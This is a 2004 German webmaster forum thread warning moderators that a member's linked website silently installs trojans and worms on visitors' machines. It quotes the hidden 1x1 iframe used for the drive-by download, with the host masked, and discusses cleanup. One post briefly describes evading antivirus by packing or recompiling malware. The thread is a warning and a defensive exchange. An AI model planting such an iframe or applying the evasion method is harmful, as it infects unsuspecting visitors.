an die Mods & Admins die nicht im Urlaub sind

Beitrag von **stp69** » 04.04.2004, 21:12

folgende Links NICHT ANKLICKEN!!!

Bei einem User in diesem Forum wird bei der hinterlegten Internetadresse mittels eines im Code verankertem iframe:

<IFRAME SRC="https://www.******-action.com/?d=get" WIDTH="1" HEIGHT="1"></IFRAME>

ein Tool auf dem Rechner geladen uns ausgeführtwelches Trojan.Noupdate.B heist.

Ich möchte die Mods bitten diesen Link zu löschen und den User der das bewußt steuert, zu löschen.
Bild

Die Seite ist: https://www.*****.de der User nennt sich renitenz und reagiert nicht auf PN.

Danke

Stephan

von **Anzeige von ABAKUS** »

Beitrag von **Southmedia** » 04.04.2004, 21:18

Oh das sind ne ganze Menge Viren die da so installiert werden... nicht nur dieser eine.

Ich habe die URLs auf deinem Beitrag mal entfernt. Klicken ja doch alle.

Den Nutzer und die URL kann ich als Moderator nicht entfernen, das muss Webby als Administrator machen. Sorry.

Beitrag von **stp69** » 04.04.2004, 21:22

danke

und Symantec auch ein danke und mit Mozila ist das nicht passiert

scheixx IE6

von **Anzeige von ABAKUS** »

Beitrag von **wulfo** » 05.04.2004, 12:01

Hallo

Auf der Seite von ****.de , User renitenz in Profil ersichtlich ist der gleiche Wurm.
Startet automatisch auch wenn Programm Virus erkennt.

Da der Virus auf einer Webseite liegt kann es nur der Besitzer der Seite dort hinterlegt haben , oder die Seite ist gehackt worden.

Es ist jedenfalls sinnvoll die Seite auch aus Profil zu entfernen.

wulfo

Beitrag von **Southmedia** » 05.04.2004, 12:35

Um diese Seite geht es ja wulfo

Wenn ihr euch das Teil eingefangen habt (auch mit Virenscanner) habt ihr ne Menge Arbeit vor euch. Das Teil nistet sich seeeehr tief im System ein.

Sobald ein Administrator da ist wird die Seite aus dem Profil entfernt.

Beitrag von **wulfo** » 05.04.2004, 14:12

Hallo

mal ehrlich solche Leute die so was in Umlauf bringen müssten streng bestraft werden.

Das sind die Leute die mehr Schaden anrichten als ein Spammer in Sumas.

Da sind die Leute nur ein wenig ärgerlich über Ergebniss, aber das hier kann richtig ins Geld gehen. Und noch dazu wo sehr viele noch nicht mal Ihre Sicherheitseinstellung im Computer richtig eingestellt haben da Sie sich einfach damit nicht auskennnen.

Beitrag von **sean** » 05.04.2004, 14:24

@wulfo

ich weiß nicht ob das Absicht ist, wenn die Kiste nicht richtig konfiguriert ist, passiert so etwas schnell. Hat mal wer ne Email an den Inhaber geschrieben?

sean

Beitrag von **wulfo** » 05.04.2004, 14:45

Hallo sean

Das kann nur schnell passieren wenn seine Seite gehackt worden ist, ansonsten kann ich mir nicht vorstellen wie jemand mehrere Viren und Würmer auf seiner Webseite hostet und die so eingestellt sind das dieses sich auch installiernen wenn du einen Scanner hast.

Sind mehrere Versionen enthalten, Worm.VB.C,
Worm.SomeFool.P, Worm.SomeFool.Gen-2 und so weiter.

Und wenn du eine Mail bekommst mit Nachricht, " Sie haben einen Wurm auf Ihrer Webseite", vieleicht noch mit Anhang,was machst du da?

löschen, klar ohne zu lesen, solche Fakemail kommen ständig, leider.

Beitrag von **Southmedia** » 05.04.2004, 14:52

Das schlimmste von den Teilen ist übrigens ein kleines Script das sich über Java installiert... wird man kaum noch los ohne Eingriffe ins System. Die Virenscanner (von Norton bis Antivir) waren alle machtlos...

Beitrag von **sean** » 05.04.2004, 15:12

@wulfo

lässt es sich steuern einen Virus so zu installieren, dass die lokalen Virenscanner umgangen werden? Ich würd das eher dem Virenscanner negativ anrechnen.

aber da bin ich zu wenig fachmann

sean

Beitrag von **wulfo** » 05.04.2004, 15:44

Hallo, Southmedia, wie hast du es gelöst?

Löschen läst sich das Teil nicht ohne weiters, ich habe es mit Ausführen
msconfig und datei deaktiviert.

sean,Virenscaner sind ja so so ganz gut, haben ja die anderen Würmer erkannt aber es werden ja ständig neue entwickelt und in Umlauf gebracht von den Spinnern.

sean. es läst sich leider steuern, genau wie einen tollen Dialer. Gibt es ja jetzt auch einen neuen. Der installiert sich , wählt ein, und löscht sich danach wieder vom System und verwischt alle Spuren.

Jetzt hast du als Nutzer wieder das Problem zu lösen, wie beweise ich das sich ein Dialer unberechtigt eingewählt hat!

So gut wie das neue Gesetzt gegen Dialer ist, das neue hier wird auch wieder vielen Geld kosten, Beweispflicht.

Beitrag von **sean** » 05.04.2004, 15:52

@wulfo

wie lässt es sich steuern? Das will ich wissen! Das eine neue Variante eines Wurms nicht immer erkannt wird ist klar, es liegen ja noch keine Erfahrungen und somit Spuren vor. Aber du sagtest was von "umgehen", das würde mich mehr interessieren.

sean

Beitrag von **Southmedia** » 05.04.2004, 15:56

Sean, in dem Fall war es wohl Javascript und so nen Kram.

Wulfo, Search&Destroy bietet Möglichkeiten die beim Start ausgeführten Dateien zu ändern, da alles typische rausgelöscht und danach noch alle verdächtigen Dateien von gestern 22:16/7 gelöscht, da bin ich nämlich auf die Seite.

Beitrag von **BLD** » 05.04.2004, 16:12

Hallo erstmal an alle,

naja, der Virenscanner sucht in Assembler ja nur nach der Viren Signatur. Du nimmst einfach den Virus bearbeitest ihn ein wenig (gibt z.B. Tools um exe dateien zu komprimieren) und er wird nicht mehr erkannt. Wenn du den Source code hast, dann kompilierst du ihn einfach in einem anderen Programm.

Jetzt musst du nur eine von momentan AFAIK 5 schweren, ungepatchten Sicherheitslücken ausnützen, und schon ist das Teil installiert.

Beitrag von **sean** » 05.04.2004, 16:12

>>> in dem Fall war es wohl Javascript und so nen Kram. <<<

zieh, zerrr, raus aus der Nase mit den Informationen, *sprüh Öl in die Nase*, zerr, schleife euch schon hinter mir her...., vielleicht muß ich ja drücken damit was raus kommt

Nu ja, bringt eure Dosen mal in Ordnung, vielleicht habt Ihr dann noch ein paar Infos.

sean